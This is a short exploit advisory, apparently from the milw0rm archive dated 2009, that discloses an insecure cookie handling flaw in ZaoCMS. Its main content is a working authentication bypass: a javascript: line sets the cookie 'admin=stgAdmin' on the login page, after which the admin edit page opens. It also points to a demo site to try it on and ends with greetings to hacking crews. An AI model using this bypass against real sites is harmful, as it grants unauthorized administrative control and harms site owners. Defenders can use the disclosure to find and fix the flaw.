-------------------------------------------------------------- ZaoCMS Insecure Cookie Handling Vulnerability --------------------------------------------------------------- Founder :ThE g0bL!N Home:http://www.zaocms.com/ Software : ZaoCMS --------------------------------------------------------------- Exploit: --------- admin/login.php javascript:document.cookie="admin=stgAdmin;path=/"; Then Go To admin/edit.php demo: ------- http://demo.zaocms.com/admin/login.php ----------------------------------------------------------------------------------------------------- His0k4 - Dr-HTmL , Dos-Dz TeaM , Snakes TeaM ArAb Academy Security Team,And Ev!L-C0d3r. ----------------------------------------------------------------------------------------------------- # milw0rm.com [2009-05-21]